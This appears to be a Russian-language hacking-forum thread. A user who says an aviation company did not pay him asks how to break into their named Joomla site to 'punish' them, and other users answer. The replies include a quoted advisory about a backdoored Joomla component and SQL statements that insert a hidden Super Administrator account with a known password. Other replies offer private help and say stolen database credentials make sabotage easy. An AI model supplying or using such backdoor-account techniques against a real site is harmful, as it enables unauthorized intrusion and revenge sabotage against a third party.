как взломать joomla?

[kovelurin]

Всем привет! Уважаемые товарищи, нужна помощь. Одна авиационная компания кинула меня на бабки. Сайт был написан, долгое время админился, но директор решил ничего не платить, и тупо сменил админа.
Предыстория такая: Сайт разрабатывался не мной, а заказывался у разработчиков. После чего был создан аккаунт с правами суперадмина, для его дальнейшей доработки и администрирование мной. С пол года я неспеша возился с сайтом, наполнял, админил, но руководсво решило сменить админа на бесплатного, и мне ничего не заплатило. Однажды пытаясь зайти на сайт, мне сказало, что у вас нет прав, и вообще пароль не верный.
Очень хочу наказать их.
сайт www.avia-soyuz.com.ua
архив базы данных и всех файлов до создания моего аккаутна есть. Кто-чем может помочь?

[adminpoly]

как решить то проблемы, скажем как закрить Datso

[pastushok777]

Цитата: Сообщение от Deementor уязвимости по Жумле тут

аха 9 языков и кроме русского, вот так и знал надо английский учить

[Deementor]

Программа: Xmap (компонент к Joomla!) 1.2.10 от 21 февраля по 23 февраля 2011 года
Опасность: Высокая
Наличие эксплоита: Нет
Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный код на целевой системе.
Уязвимость существует из-за распространения скомпрометированного исходного кода Xmap компонента, который содержал бекдор. Удаленный пользователь может выполнить произвольный код на целевой системе.
URL производителя: joomla.vargas.co.cr/

Решение: Установите исправленную версию 1.2.10 с сайта производителя.

[zek1833]

Если есть доступ к БД, или FTP пароли то:
Выполни в БД запрос:
INSERT INTO jos_users( `name`, `username`, `password`, `email`, `usertype`, `gid` )
VALUES( 'admin2', 'admin2', md5('12345'), 'admin2@mail.ru', 'Super Administrator', 25 );

INSERT INTO jos_core_acl_aro( `section_value`, `value` )
VALUES ( 'users', LAST_INSERT_ID() );

INSERT INTO jos_core_acl_groups_aro_map( `group_id`, `aro_id` )
VALUES ( 25, LAST_INSERT_ID() );

Вход в админку по логину admin2 и паролю 12345

[EDOS]

Цитата: Сообщение от kovelurin Всем привет! Уважаемые товарищи, нужна помощь. Одна авиационная компания кинула меня на бабки. Сайт был написан, долгое время админился, но директор решил ничего не платить, и тупо сменил админа. Предыстория такая: Сайт разрабатывался не мной, а заказывался у разработчиков. После чего был создан аккаунт с правами суперадмина, для его дальнейшей доработки и администрирование мной. С пол года я неспеша возился с сайтом, наполнял, админил, но руководсво решило сменить админа на бесплатного, и мне ничего не заплатило. Однажды пытаясь зайти на сайт, мне сказало, что у вас нет прав, и вообще пароль не верный. Очень хочу наказать их. сайт www.avia-soyuz.com.ua архив базы данных и всех файлов до создания моего аккаутна есть. Кто-чем может помочь?

Есть решение для Joomla, написал тебе в личку

[llektor]

Если есть доступ к БД, или FTP пароли

[doktoron]

Если у Вас есть путь к базе SQL(даеется хостером), ee имя, логин и пароль (это из файла configuration.php) то сделать им бяку легко.